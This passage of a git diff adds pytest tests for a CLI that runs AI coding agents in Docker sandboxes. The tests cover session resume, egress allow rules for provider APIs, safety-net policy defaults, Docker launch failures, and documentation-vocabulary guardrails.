placeholder_tip(PlaceholderKind.NO_SESSIONS) + assert "session" in tip.lower() + + def test_start_reason_for_no_containers(self) -> None: + """NO_CONTAINERS placeholder → 'no_containers' reason.""" + item = PlaceholderItem( + label="", description="", kind=PlaceholderKind.NO_CONTAINERS, startable=True + ) + assert placeholder_start_reason(item) == "no_containers" + + def test_start_reason_for_no_sessions(self) -> None: + """NO_SESSIONS placeholder → 'no_sessions' reason.""" + item = PlaceholderItem( + label="", description="", kind=PlaceholderKind.NO_SESSIONS, startable=True + ) + assert placeholder_start_reason(item) == "no_sessions" + + def test_start_reason_unknown_kind(self) -> None: + """Unrecognized placeholder kind → 'unknown' reason.""" + item = PlaceholderItem(label="", description="", kind=PlaceholderKind.ERROR, startable=True) + assert placeholder_start_reason(item) == "unknown" diff --git a/tests/test_dashboard_provider_resume.py b/tests/test_dashboard_provider_resume.py new file mode 100644 index 0000000..27db92c --- /dev/null +++ b/tests/test_dashboard_provider_resume.py @@ -0,0 +1,162 @@ +"""Tests for provider-neutral dashboard start and resume handlers.""" + +from __future__ import annotations + +from pathlib import Path +from unittest.mock import MagicMock, patch + +from scc_cli.application import dashboard as app_dashboard +from scc_cli.commands.launch.conflict_resolution import LaunchConflictDecision +from scc_cli.commands.launch.preflight import ( + AuthStatus, + ImageStatus, + LaunchReadiness, + ProviderResolutionSource, +) +from scc_cli.ports.session_models import SessionSummary +from scc_cli.ui.dashboard.orchestrator_handlers import ( + _handle_session_resume, + _handle_worktree_start, +) + + +def _fake_adapters() -> MagicMock: + adapters = MagicMock() + adapters.sandbox_runtime.ensure_available.return_value = None + provider = MagicMock() + provider.capability_profile.return_value.display_name = "Codex" + provider.auth_check.return_value.status = "present" + adapters.agent_provider = provider + adapters.codex_agent_provider = provider + return adapters + + +def _ready_readiness(provider_id: str = "codex") -> LaunchReadiness: + return LaunchReadiness( + provider_id=provider_id, + resolution_source=ProviderResolutionSource.GLOBAL_PREFERRED, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.PRESENT, + requires_image_bootstrap=False, + requires_auth_bootstrap=False, + launch_ready=True, + ) + + +@patch("scc_cli.config.load_user_config", return_value={}) +@patch("scc_cli.config.load_cached_org_config", return_value=None) +@patch("scc_cli.commands.launch.workspace.validate_and_resolve_workspace") +@patch("scc_cli.bootstrap.get_default_adapters") +@patch( + "scc_cli.commands.launch.preflight.resolve_launch_provider", + return_value=("codex", ProviderResolutionSource.RESUME), +) +@patch("scc_cli.commands.launch.preflight.collect_launch_readiness") +@patch("scc_cli.commands.launch.dependencies.prepare_live_start_plan") +@patch("scc_cli.commands.launch.conflict_resolution.resolve_launch_conflict") +@patch("scc_cli.commands.launch.render.show_launch_panel") +@patch("scc_cli.application.launch.finalize_launch") +@patch("scc_cli.workspace_local_config.set_workspace_last_used_provider") +def test_handle_session_resume_uses_provider_neutral_pipeline( + mock_set_workspace_provider: MagicMock, + mock_finalize: MagicMock, + mock_launch_panel: MagicMock, + mock_conflict: MagicMock, + mock_prepare: MagicMock, + mock_readiness: MagicMock, + _mock_resolve: MagicMock, + mock_adapters: MagicMock, + mock_validate: MagicMock, + _mock_org: MagicMock, + _mock_cfg: MagicMock, + tmp_path: Path, +) -> None: + workspace = tmp_path / "repo" + workspace.mkdir() + mock_validate.return_value = workspace + adapters = _fake_adapters() + mock_adapters.return_value = adapters + mock_readiness.return_value = _ready_readiness() + start_plan = MagicMock() + start_plan.current_branch = "develop" + mock_prepare.return_value = (adapters, start_plan) + mock_conflict.return_value = MagicMock( + decision=LaunchConflictDecision.PROCEED, + plan=start_plan, + ) + + session = SessionSummary( + name="develop", + workspace=str(workspace), + team=None, + last_used=None, + container_name="scc-oci-123", + branch="develop", + provider_id="codex", + ) + + assert _handle_session_resume(session) is True + + request = mock_prepare.call_args.args[0] + assert request.provider_id == "codex" + assert request.resume is True + mock_readiness.assert_called_once() + mock_launch_panel.assert_called_once() + mock_finalize.assert_called_once_with(start_plan, dependencies=adapters) + mock_set_workspace_provider.assert_called_once_with(workspace, "codex") + + +@patch("scc_cli.config.load_user_config", return_value={}) +@patch("scc_cli.config.load_cached_org_config", return_value=None) +@patch("scc_cli.config.get_selected_provider", return_value=None) +@patch("scc_cli.commands.launch.workspace.validate_and_resolve_workspace") +@patch("scc_cli.bootstrap.get_default_adapters") +@patch( + "scc_cli.commands.launch.preflight.resolve_launch_provider", + return_value=("codex", ProviderResolutionSource.GLOBAL_PREFERRED), +) +@patch("scc_cli.commands.launch.preflight.collect_launch_readiness") +@patch("scc_cli.commands.launch.dependencies.prepare_live_start_plan") +@patch("scc_cli.commands.launch.conflict_resolution.resolve_launch_conflict") +@patch("scc_cli.commands.launch.render.show_launch_panel") +@patch("scc_cli.application.launch.finalize_launch") +@patch("scc_cli.workspace_local_config.set_workspace_last_used_provider") +def test_handle_worktree_start_uses_provider_neutral_pipeline( + mock_set_workspace_provider: MagicMock, + mock_finalize: MagicMock, + mock_launch_panel: MagicMock, + mock_conflict: MagicMock, + mock_prepare: MagicMock, + mock_readiness: MagicMock, + _mock_resolve: MagicMock, + mock_adapters: MagicMock, + mock_validate: MagicMock, + _mock_selected: MagicMock, + _mock_org: MagicMock, + _mock_cfg: MagicMock, + tmp_path: Path, +) -> None: + workspace = tmp_path / "worktree" + workspace.mkdir() + mock_validate.return_value = workspace + adapters = _fake_adapters() + mock_adapters.return_value = adapters + mock_readiness.return_value = _ready_readiness() + start_plan = MagicMock() + start_plan.current_branch = "feature" + mock_prepare.return_value = (adapters, start_plan) + mock_conflict.return_value = MagicMock( + decision=LaunchConflictDecision.PROCEED, + plan=start_plan, + ) + + result = _handle_worktree_start(str(workspace)) + + assert result.decision is app_dashboard.StartFlowDecision.LAUNCHED + request = mock_prepare.call_args.args[0] + assert request.provider_id == "codex" + assert request.resume is False + mock_readiness.assert_called_once() + mock_launch_panel.assert_called_once() + mock_finalize.assert_called_once_with(start_plan, dependencies=adapters) + mock_set_workspace_provider.assert_called_once_with(workspace, "codex") diff --git a/tests/test_destination_registry.py b/tests/test_destination_registry.py new file mode 100644 index 0000000..e957e77 --- /dev/null +++ b/tests/test_destination_registry.py @@ -0,0 +1,154 @@ +"""Tests for the provider destination registry — resolution, errors, and rule generation.""" + +from __future__ import annotations + +import pytest + +from scc_cli.core.contracts import DestinationSet, EgressRule +from scc_cli.core.destination_registry import ( + PROVIDER_DESTINATION_SETS, + destination_sets_to_allow_rules, + resolve_destination_sets, +) + +# --------------------------------------------------------------------------- +# Registry contents +# --------------------------------------------------------------------------- + + +class TestRegistryContents: + """Verify the canonical registry has the expected provider entries.""" + + def test_anthropic_core_present(self) -> None: + ds = PROVIDER_DESTINATION_SETS["anthropic-core"] + assert ds.name == "anthropic-core" + assert "api.anthropic.com" in ds.destinations + assert ds.required is True + + def test_openai_core_present(self) -> None: + ds = PROVIDER_DESTINATION_SETS["openai-core"] + assert ds.name == "openai-core" + assert "api.openai.com" in ds.destinations + assert ds.required is True + + def test_all_entries_are_destination_sets(self) -> None: + for key, ds in PROVIDER_DESTINATION_SETS.items(): + assert isinstance(ds, DestinationSet), f"{key} is not a DestinationSet" + assert ds.name == key, f"name mismatch: {ds.name!r} != {key!r}" + + +# --------------------------------------------------------------------------- +# Resolution +# --------------------------------------------------------------------------- + + +class TestResolveDestinationSets: + """Test resolve_destination_sets with valid and invalid inputs.""" + + def test_resolve_anthropic_core(self) -> None: + result = resolve_destination_sets(("anthropic-core",)) + assert len(result) == 1 + assert result[0].name == "anthropic-core" + + def test_resolve_openai_core(self) -> None: + result = resolve_destination_sets(("openai-core",)) + assert len(result) == 1 + assert result[0].name == "openai-core" + + def test_resolve_multiple_sets(self) -> None: + result = resolve_destination_sets(("anthropic-core", "openai-core")) + assert len(result) == 2 + assert result[0].name == "anthropic-core" + assert result[1].name == "openai-core" + + def test_resolve_preserves_order(self) -> None: + result = resolve_destination_sets(("openai-core", "anthropic-core")) + assert result[0].name == "openai-core" + assert result[1].name == "anthropic-core" + + def test_empty_input_returns_empty_tuple(self) -> None: + result = resolve_destination_sets(()) + assert result == () + + def test_unknown_name_raises_value_error(self) -> None: + with pytest.raises(ValueError, match="Unknown destination set 'nonexistent'"): + resolve_destination_sets(("nonexistent",)) + + def test_unknown_among_valid_raises_value_error(self) -> None: + with pytest.raises(ValueError, match="Unknown destination set 'bad-name'"): + resolve_destination_sets(("anthropic-core", "bad-name")) + + +# --------------------------------------------------------------------------- +# Rule generation +# --------------------------------------------------------------------------- + + +class TestDestinationSetsToAllowRules: + """Test allow-rule generation from resolved destination sets.""" + + def test_single_set_single_host(self) -> None: + sets = ( + DestinationSet( + name="test-set", + destinations=("example.com",), + required=True, + description="test", + ), + ) + rules = destination_sets_to_allow_rules(sets) + assert len(rules) == 1 + assert rules[0] == EgressRule( + target="example.com", + allow=True, + reason="provider-core: test-set", + ) + + def test_single_set_multiple_hosts(self) -> None: + sets = ( + DestinationSet( + name="multi", + destinations=("a.example.com", "b.example.com"), + required=False, + description="multi-host test", + ), + ) + rules = destination_sets_to_allow_rules(sets) + assert len(rules) == 2 + assert rules[0].target == "a.example.com" + assert rules[1].target == "b.example.com" + assert all(r.allow is True for r in rules) + assert all(r.reason == "provider-core: multi" for r in rules) + + def test_multiple_sets_produce_combined_rules(self) -> None: + anthropic = PROVIDER_DESTINATION_SETS["anthropic-core"] + openai = PROVIDER_DESTINATION_SETS["openai-core"] + rules = destination_sets_to_allow_rules((anthropic, openai)) + targets = [r.target for r in rules] + assert "api.anthropic.com" in targets + assert "api.openai.com" in targets + assert all(r.allow is True for r in rules) + + def test_rule_targets_match_set_hosts(self) -> None: + sets = resolve_destination_sets(("anthropic-core",)) + rules = destination_sets_to_allow_rules(sets) + rule_targets = {r.target for r in rules} + set_hosts = set(sets[0].destinations) + assert rule_targets == set_hosts + + def test_empty_sets_returns_empty_rules(self) -> None: + rules = destination_sets_to_allow_rules(()) + assert rules == () + + def test_all_rules_are_egress_rule_instances(self) -> None: + sets = resolve_destination_sets(("anthropic-core", "openai-core")) + rules = destination_sets_to_allow_rules(sets) + for rule in rules: + assert isinstance(rule, EgressRule) + + def test_reason_format_contains_set_name(self) -> None: + sets = resolve_destination_sets(("openai-core",)) + rules = destination_sets_to_allow_rules(sets) + for rule in rules: + assert "openai-core" in rule.reason + assert rule.reason.startswith("provider-core: ") diff --git a/tests/test_docker_core.py b/tests/test_docker_core.py index 82e96b6..fa45a46 100644 --- a/tests/test_docker_core.py +++ b/tests/test_docker_core.py @@ -910,6 +910,20 @@ def test_handles_docker_not_found(self): assert containers == [] +class TestListRunningSccContainers: + """Tests for list_running_scc_containers() - running SCC inventory only.""" + + def test_filters_out_stopped_scc_containers(self): + """Should include only running SCC-managed containers.""" + running = docker.ContainerInfo(id="a1", name="run", status="Up 2 hours") + stopped = docker.ContainerInfo(id="b2", name="stop", status="Exited (0) 1 hour ago") + + with patch("scc_cli.docker.core.list_scc_containers", return_value=[running, stopped]): + containers = docker.list_running_scc_containers() + + assert containers == [running] + + # ═══════════════════════════════════════════════════════════════════════════════ # Tests for list_running_sandboxes # ═══════════════════════════════════════════════════════════════════════════════ diff --git a/tests/test_docker_launch_characterization.py b/tests/test_docker_launch_characterization.py new file mode 100644 index 0000000..3372a61 --- /dev/null +++ b/tests/test_docker_launch_characterization.py @@ -0,0 +1,301 @@ +"""Characterization tests for docker/launch.py. + +These tests capture the current behavior of the Docker launch module +before S02 surgery decomposes it. They protect against accidental behavior +changes during the split. + +Target: src/scc_cli/docker/launch.py (run_sandbox 216 lines, 54% coverage) +""" + +from __future__ import annotations + +import json +import subprocess +from pathlib import Path +from typing import Any +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.core.errors import SandboxLaunchError +from scc_cli.docker import launch + +# ═══════════��═══════════════════════════��══════════════════════════���════════════ +# Safety Net Policy Extraction & Validation +# ══════════════════════════���═══════════════════════════════════��════════════════ + + +class TestSafetyPolicyExtraction: + """Characterize safety-net policy extraction from org config.""" + + def test_extract_returns_none_when_org_config_is_none(self) -> None: + """No org config → no safety-net policy.""" + assert launch.extract_safety_net_policy(None) is None + + def test_extract_returns_none_when_no_security_section(self) -> None: + """Org config without security section → no policy.""" + assert launch.extract_safety_net_policy({"teams": {}}) is None + + def test_extract_returns_none_when_security_not_dict(self) -> None: + """Non-dict security value → no policy.""" + assert launch.extract_safety_net_policy({"security": "invalid"}) is None + + def test_extract_returns_none_when_no_safety_net_key(self) -> None: + """Security section without safety_net → no policy.""" + assert launch.extract_safety_net_policy({"security": {"other": True}}) is None + + def test_extract_returns_policy_when_present(self) -> None: + """Valid org config with safety_net → returns the policy dict.""" + org_config: dict[str, Any] = { + "security": {"safety_net": {"action": "warn", "rules": ["no-secrets"]}} + } + policy = launch.extract_safety_net_policy(org_config) + assert policy is not None + assert policy["action"] == "warn" + assert policy["rules"] == ["no-secrets"] + + +class TestSafetyPolicyValidation: + """Characterize safety-net policy validation (fail-closed behavior).""" + + def test_valid_action_preserved(self) -> None: + """Valid 'warn' action is kept as-is.""" + result = launch.validate_safety_net_policy({"action": "warn"}) + assert result["action"] == "warn" + + def test_valid_allow_action_preserved(self) -> None: + """Valid 'allow' action is kept as-is.""" + result = launch.validate_safety_net_policy({"action": "allow"}) + assert result["action"] == "allow" + + def test_missing_action_defaults_to_block(self) -> None: + """Missing action → fail-closed to 'block'.""" + result = launch.validate_safety_net_policy({"rules": ["some-rule"]}) + assert result["action"] == "block" + + def test_invalid_action_defaults_to_block(self) -> None: + """Invalid action value → fail-closed to 'block'.""" + result = launch.validate_safety_net_policy({"action": "yolo"}) + assert result["action"] == "block" + + def test_extra_keys_preserved(self) -> None: + """Extra keys in policy are preserved through validation.""" + result = launch.validate_safety_net_policy({"action": "warn", "custom": True}) + assert result["custom"] is True + + +class TestEffectivePolicy: + """Characterize get_effective_safety_net_policy fallback behavior.""" + + def test_returns_default_when_org_config_none(self) -> None: + """No org config → DEFAULT_SAFETY_NET_POLICY (block).""" + result = launch.get_effective_safety_net_policy(None) + assert result["action"] == "block" + + def test_returns_validated_custom_policy_when_present(self) -> None: + """Valid org config → validated custom policy.""" + org: dict[str, Any] = {"security": {"safety_net": {"action": "allow"}}} + result = launch.get_effective_safety_net_policy(org) + assert result["action"] == "allow" + + def test_returns_default_when_safety_net_missing(self) -> None: + """Org config without safety_net → default block policy.""" + result = launch.get_effective_safety_net_policy({"security": {}}) + assert result["action"] == "block" + + +# ════════════════════════════════��═══════════════════════════════════��══════════ +# Policy Host File Writing +# ══════════════��══════════════��═════════════════════════════════════════════════ + + +class TestWritePolicyToDir: + """Characterize atomic policy writing to host.""" + + def test_writes_policy_file_to_dir(self, tmp_path: Path) -> None: + """Policy is written as JSON to the target directory.""" + result = launch._write_policy_to_dir({"action": "warn"}, tmp_path) + assert result is not None + content = json.loads(result.read_text()) + assert content["action"] == "warn" + + def test_creates_parent_dirs(self, tmp_path: Path) -> None: + """Creates parent directories if they don't exist.""" + target = tmp_path / "deep" / "nested" / "dir" + result = launch._write_policy_to_dir({"action": "block"}, target) + assert result is not None + assert result.exists() + + def test_returns_none_on_unwritable_dir(self) -> None: + """Returns None if the directory cannot be created.""" + # /proc/fake is never writable + result = launch._write_policy_to_dir({"action": "block"}, Path("/proc/fake/deep")) + assert result is None + + +# ════════════════════════════════���═══════════════════════════════════════���══════ +# run_sandbox Failure Branches +# ════════════════════════════���════════════════════════════════���═════════════════ + + +class TestRunSandboxFailures: + """Characterize run_sandbox error handling for Docker-unavailable scenarios.""" + + @patch("scc_cli.docker.launch.write_safety_net_policy_to_host") + @patch("scc_cli.docker.launch.get_effective_safety_net_policy") + @patch("scc_cli.docker.launch.reset_global_settings", return_value=True) + @patch("scc_cli.docker.sandbox._sync_credentials_from_existing_containers") + @patch("scc_cli.docker.sandbox._preinit_credential_volume") + @patch("subprocess.run") + @patch("os.name", "posix") + def test_raises_on_detached_failure( + self, + mock_run: MagicMock, + mock_preinit: MagicMock, + mock_sync: MagicMock, + mock_reset: MagicMock, + mock_policy: MagicMock, + mock_write: MagicMock, + tmp_path: Path, + ) -> None: + """run_sandbox raises SandboxLaunchError when detached container creation fails.""" + mock_policy.return_value = {"action": "block"} + mock_write.return_value = tmp_path / "policy.json" + mock_run.return_value = MagicMock( + returncode=1, + stdout="", + stderr="Docker daemon not running", + ) + + with pytest.raises(SandboxLaunchError, match="Failed to create Docker sandbox"): + launch.run_sandbox(workspace=tmp_path, ensure_credentials=True) + + @patch("scc_cli.docker.launch.write_safety_net_policy_to_host") + @patch("scc_cli.docker.launch.get_effective_safety_net_policy") + @patch("scc_cli.docker.launch.reset_global_settings", return_value=True) + @patch("scc_cli.docker.sandbox._sync_credentials_from_existing_containers") + @patch("scc_cli.docker.sandbox._preinit_credential_volume") + @patch("subprocess.run") + @patch("os.name", "posix") + def test_raises_on_empty_container_id( + self, + mock_run: MagicMock, + mock_preinit: MagicMock, + mock_sync: MagicMock, + mock_reset: MagicMock, + mock_policy: MagicMock, + mock_write: MagicMock, + tmp_path: Path, + ) -> None: + """run_sandbox raises when detached start returns empty container ID.""" + mock_policy.return_value = {"action": "block"} + mock_write.return_value = tmp_path / "policy.json" + mock_run.return_value = MagicMock( + returncode=0, + stdout="", # Empty container ID + stderr="", + ) + + with pytest.raises(SandboxLaunchError, match="empty container ID"): + launch.run_sandbox(workspace=tmp_path, ensure_credentials=True) + + @patch("scc_cli.docker.launch.write_safety_net_policy_to_host") + @patch("scc_cli.docker.launch.get_effective_safety_net_policy") + @patch("scc_cli.docker.launch.reset_global_settings", return_value=False) + @patch("scc_cli.docker.sandbox._sync_credentials_from_existing_containers") + @patch("scc_cli.docker.sandbox._preinit_credential_volume") + @patch("scc_cli.docker.sandbox._create_symlinks_in_container") + @patch("scc_cli.docker.sandbox._start_migration_loop") + @patch("subprocess.run") + @patch("os.execvp") + @patch("os.name", "posix") + def test_reset_failure_continues_with_warning( + self, + mock_execvp: MagicMock, + mock_run: MagicMock, + mock_migration: MagicMock, + mock_symlinks: MagicMock, + mock_preinit: MagicMock, + mock_sync: MagicMock, + mock_reset: MagicMock, + mock_policy: MagicMock, + mock_write: MagicMock, + tmp_path: Path, + ) -> None: + """run_sandbox continues (doesn't crash) when reset_global_settings returns False.""" + mock_policy.return_value = {"action": "block"} + mock_write.return_value = tmp_path / "policy.json" + mock_run.return_value = MagicMock( + returncode=0, + stdout="container123", + stderr="", + ) + # execvp should not return; raise to exit the flow + mock_execvp.side_effect = SystemExit(0) + + with pytest.raises(SystemExit): + launch.run_sandbox(workspace=tmp_path, ensure_credentials=True) + + # Verify it got past reset failure to the run phase + assert mock_run.called + + +# ══════════════��═══════════════════════���═════════════════════════════════���══════ +# Mount Race Detection +# ═══════════════════════════════���═════════════════════════���═════════════════════ + + +class TestMountRaceDetection: + """Characterize _is_mount_race_error detection patterns.""" + + def test_detects_bind_source_error(self) -> None: + """'bind source path does not exist' is a retryable mount race.""" + assert launch._is_mount_race_error("Error: bind source path does not exist") is True + + def test_detects_no_such_file(self) -> None: + """'no such file or directory' is a retryable mount race.""" + assert launch._is_mount_race_error("Error: no such file or directory") is True + + def test_rejects_unrelated_error(self) -> None: + """Unrelated Docker errors are not mount race conditions.""" + assert launch._is_mount_race_error("permission denied") is False + + def test_case_insensitive(self) -> None: + """Detection is case-insensitive.""" + assert launch._is_mount_race_error("BIND SOURCE PATH DOES NOT EXIST") is True + + +# ═════════════════════════════════════���═════════════════════════════════════════ +# inject_file_to_sandbox_volume +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestInjectFile: + """Characterize inject_file_to_sandbox_volume.""" + + @patch("subprocess.run") + def test_inject_success(self, mock_run: MagicMock) -> None: + """Returns True when docker run succeeds.""" + mock_run.return_value = MagicMock(returncode=0) + result = launch.inject_file_to_sandbox_volume("test.json", '{"key": "val"}') + assert result is True + assert mock_run.called + + @patch("subprocess.run") + def test_inject_failure(self, mock_run: MagicMock) -> None: + """Returns False when docker run fails.""" + mock_run.return_value = MagicMock(returncode=1) + result = launch.inject_file_to_sandbox_volume("test.json", "content") + assert result is False + + @patch("subprocess.run", side_effect=subprocess.TimeoutExpired(cmd="docker", timeout=30)) + def test_inject_timeout(self, mock_run: MagicMock) -> None: + """Returns False on timeout (no exception propagated).""" + result = launch.inject_file_to_sandbox_volume("test.json", "content") + assert result is False + + @patch("subprocess.run", side_effect=FileNotFoundError("docker not found")) + def test_inject_docker_not_found(self, mock_run: MagicMock) -> None: + """Returns False when docker binary is not found.""" + result = launch.inject_file_to_sandbox_volume("test.json", "content") + assert result is False diff --git a/tests/test_docker_policy_integration.py b/tests/test_docker_policy_integration.py index 7cd442f..517dcf6 100644 --- a/tests/test_docker_policy_integration.py +++ b/tests/test_docker_policy_integration.py @@ -22,7 +22,9 @@ import pytest -from scc_cli.core.constants import SAFETY_NET_POLICY_FILENAME +from scc_cli.docker.launch import ( + _SAFETY_NET_POLICY_FILENAME as SAFETY_NET_POLICY_FILENAME, +) from scc_cli.docker.launch import ( DEFAULT_SAFETY_NET_POLICY, VALID_SAFETY_NET_ACTIONS, diff --git a/tests/test_docs_truthfulness.py b/tests/test_docs_truthfulness.py new file mode 100644 index 0000000..67c5fb2 --- /dev/null +++ b/tests/test_docs_truthfulness.py @@ -0,0 +1,1025 @@ +"""Guardrail: prevent stale vocabulary and documentation truthfulness regressions. + +After M003-S05 vocabulary cleanup, all user-facing strings, README claims, and +example configs must use the current NetworkPolicy vocabulary: + - open + - web-egress-enforced + - locked-down-web + +Old names (unrestricted, corp-proxy-only, corp-proxy, isolated) must not appear +as network_policy values in source, docs, or examples. Additionally, the README +must not claim Docker Desktop is a hard requirement — it should list Docker +generically (Engine, Desktop, OrbStack, Colima) per Constitution §3. + +After M004 safety engine delivery, the README must truthfully document: + - The ``scc support safety-audit`` command + - SCC's built-in safety engine as a core capability (not plugin-only) + - Runtime wrappers as defense-in-depth for destructive git + explicit network tools + - All expected core safety modules and provider adapter files must exist +""" + +from __future__ import annotations + +import json +import re +from pathlib import Path + +from scc_cli.core.enums import NetworkPolicy + +ROOT = Path(__file__).resolve().parents[1] +SRC = ROOT / "src" / "scc_cli" +COMMANDS_DIR = SRC / "commands" +EXAMPLES_DIR = ROOT / "examples" +README = ROOT / "README.md" + +# Stale network-mode names that must not appear as policy values +STALE_NAMES = {"unrestricted", "corp-proxy-only", "corp-proxy", "isolated"} + +# Valid network policy values drawn from the canonical enum +VALID_POLICIES = {member.value for member in NetworkPolicy} + + +# --------------------------------------------------------------------------- +# Test a: blocked_by strings in source must not contain stale network modes +# --------------------------------------------------------------------------- + + +def test_no_stale_network_modes_in_blocked_by_strings() -> None: + """No blocked_by= string literal in src/scc_cli/ should reference old network mode names. + + We scan for string literals that appear as blocked_by arguments containing + stale names. The pattern matches ``blocked_by="...stale..."`` and + ``blocked_by='...stale...'`` in Python source. + """ + # Regex: blocked_by= followed by a string literal containing a stale name + pattern = re.compile( + r"""blocked_by\s*=\s*(?:f?["'])([^"']+)(?:["'])""", + ) + violations: list[str] = [] + + for py_file in sorted(SRC.rglob("*.py")): + source = py_file.read_text(encoding="utf-8") + for match in pattern.finditer(source): + value = match.group(1) + for stale in STALE_NAMES: + # Match stale name as a network_policy value, not incidental English + # e.g. "network_policy=isolated" is stale, but "isolated feature" is not + if re.search(rf"(?:network_policy|policy)\s*[=:]\s*{re.escape(stale)}\b", value): + lineno = source[: match.start()].count("\n") + 1 + rel = py_file.relative_to(SRC) + violations.append( + f" {rel}:{lineno}: blocked_by contains stale '{stale}' → {value!r}" + ) + + if violations: + raise AssertionError( + "Stale network mode names found in blocked_by= strings.\n" + "Use 'open', 'web-egress-enforced', or 'locked-down-web' instead.\n\n" + "Violations:\n" + "\n".join(violations) + ) + + +# --------------------------------------------------------------------------- +# Test b: warning/error strings in commands/ must not contain stale names +# --------------------------------------------------------------------------- + + +def test_no_stale_network_modes_in_user_warnings() -> None: + """Warning and error strings in src/scc_cli/commands/ must not reference old network mode names. + + Targets string literals that mention network_policy/proxy context alongside + a stale mode name — avoids false positives on unrelated uses of 'isolated'. + """ + # Match string literals that contain both a context keyword and a stale name + context_kw = r"(?:network_policy|proxy|network.mode|egress)" + violations: list[str] = [] + + for py_file in sorted(COMMANDS_DIR.rglob("*.py")): + source = py_file.read_text(encoding="utf-8") + lines = source.splitlines() + for i, line in enumerate(lines, start=1): + # Only inspect lines that look like they contain warning/error strings + if not re.search( + r"(?:warn|error|message|msg|print|log|click\.echo)", line, re.IGNORECASE + ): + continue + # Check if the line has a stale name in network context + for stale in STALE_NAMES: + if re.search(rf"{context_kw}.*\b{re.escape(stale)}\b", line, re.IGNORECASE): + rel = py_file.relative_to(COMMANDS_DIR) + violations.append(f" commands/{rel}:{i}: stale '{stale}' → {line.strip()!r}") + elif re.search(rf"\b{re.escape(stale)}\b.*{context_kw}", line, re.IGNORECASE): + rel = py_file.relative_to(COMMANDS_DIR) + violations.append(f" commands/{rel}:{i}: stale '{stale}' → {line.strip()!r}") + + if violations: + raise AssertionError( + "Stale network mode names found in user-facing warnings/errors.\n" + "Use 'open', 'web-egress-enforced', or 'locked-down-web' instead.\n\n" + "Violations:\n" + "\n".join(violations) + ) + + +# --------------------------------------------------------------------------- +# Test c: README must not claim Docker Desktop is a hard requirement +# --------------------------------------------------------------------------- + + +def test_readme_no_docker_desktop_hard_requirement() -> None: + """README must not say 'Requires Docker Desktop' without mentioning alternatives. + + Per Constitution §3, Docker is listed generically. If Docker Desktop appears + in a 'Requires' context, alternatives (Engine, OrbStack, Colima) must also + be mentioned on the same line or within the next two lines. + """ + readme_text = README.read_text(encoding="utf-8") + lines = readme_text.splitlines() + + for i, line in enumerate(lines): + if re.search(r"Requires.*Docker\s+Desktop", line, re.IGNORECASE): + # Check current line and next two for alternatives + context = " ".join(lines[i : i + 3]) + has_alternatives = all( + alt.lower() in context.lower() for alt in ("Engine", "OrbStack", "Colima") + ) + if not has_alternatives: + raise AssertionError( + f"README.md:{i + 1}: 'Requires Docker Desktop' without mentioning " + "Engine/OrbStack/Colima alternatives.\n" + f"Line: {line!r}" + ) + + +# --------------------------------------------------------------------------- +# Test c2: Docker Desktop references must not appear in active user-facing paths +# --------------------------------------------------------------------------- + +# Directories/files where Docker Desktop references are allowed (infrastructure, +# adapter, and error layers that legitimately mention Desktop as one backend). +_DOCKER_DESKTOP_ALLOWED_DIRS = { + "docker", # docker/ module (core, launch, sandbox, credentials) + "adapters", # docker_sandbox_runtime, docker_runtime_probe, oci_* + "core", # errors.py (typed Desktop-specific failure) + "doctor", # checks that list Desktop as one option among several +} + + +def test_no_docker_desktop_in_active_user_paths() -> None: + """Docker Desktop must not appear in commands/, ui/, application/, setup*. + + Active user-facing modules should say 'Docker' or 'container runtime', + not 'Docker Desktop'. Docker Desktop references are allowed only in + infrastructure/adapter layers listed in _DOCKER_DESKTOP_ALLOWED_DIRS. + """ + violations: list[str] = [] + for py_file in sorted(SRC.rglob("*.py")): + rel = py_file.relative_to(SRC) + # Skip allowed directories + if rel.parts[0] in _DOCKER_DESKTOP_ALLOWED_DIRS: + continue + # Skip __pycache__ + if "__pycache__" in str(rel): + continue + try: + text = py_file.read_text(encoding="utf-8") + except (OSError, UnicodeDecodeError): + continue + for i, line in enumerate(text.splitlines(), 1): + if "Docker Desktop" in line: + violations.append(f"{rel}:{i}: {line.strip()}") + + if violations: + raise AssertionError( + "'Docker Desktop' found in active user-facing paths.\n" + "Use 'Docker' or 'container runtime' instead.\n" + "Allowed only in: docker/, adapters/, core/errors.py, doctor/\n\n" + "Violations:\n" + "\n".join(violations) + ) + + +# --------------------------------------------------------------------------- +# Test d: README must not contain stale network mode names as values +# --------------------------------------------------------------------------- + + +def test_readme_no_stale_network_mode_names() -> None: + """README must not reference old network mode names as network_policy values. + + The word 'isolated' in prose (e.g. 'isolated environment') is acceptable. + Only matches in JSON-like context, backticks, or adjacent to network_policy + are flagged. + """ + readme_text = README.read_text(encoding="utf-8") + violations: list[str] = [] + + for i, line in enumerate(readme_text.splitlines(), start=1): + for stale in STALE_NAMES: + # Match in backtick context: `isolated`, `unrestricted` + if re.search(rf"`{re.escape(stale)}`", line): + violations.append( + f" README.md:{i}: stale '{stale}' in backticks → {line.strip()!r}" + ) + continue + # Match in JSON-like context: "isolated", "unrestricted" + if re.search(rf'"{re.escape(stale)}"', line): + violations.append(f" README.md:{i}: stale '{stale}' in quotes → {line.strip()!r}") + continue + # Match adjacent to network_policy keyword + if re.search(rf"network_policy.*\b{re.escape(stale)}\b", line, re.IGNORECASE): + violations.append( + f" README.md:{i}: stale '{stale}' near network_policy → {line.strip()!r}" + ) + + if violations: + raise AssertionError( + "Stale network mode names found in README.md as policy values.\n" + "Use 'open', 'web-egress-enforced', or 'locked-down-web' instead.\n\n" + "Violations:\n" + "\n".join(violations) + ) + + +# --------------------------------------------------------------------------- +# Test e: example JSON files must use valid NetworkPolicy values +# --------------------------------------------------------------------------- + + +def test_example_json_uses_valid_network_policy_values() -> None: + """All network_policy values in examples/*.json must be valid NetworkPolicy members.""" + if not EXAMPLES_DIR.is_dir(): + return # No examples directory — nothing to check + + violations: list[str] = [] + json_files = sorted(EXAMPLES_DIR.glob("*.json")) + + if not json_files: + return # No JSON files — nothing to check + + for json_file in json_files: + text = json_file.read_text(encoding="utf-8") + try: + data = json.loads(text) + except json.JSONDecodeError: + violations.append(f" {json_file.name}: invalid JSON") + continue + + # Recursively find all "network_policy" values in the JSON tree + found = _extract_network_policy_values(data) + for path_str, value in found: + if value not in VALID_POLICIES: + violations.append( + f" {json_file.name}: {path_str} = {value!r} " + f"(expected one of {sorted(VALID_POLICIES)})" + ) + + if violations: + raise AssertionError( + "Invalid network_policy values found in example JSON files.\n\n" + "Violations:\n" + "\n".join(violations) + ) + + 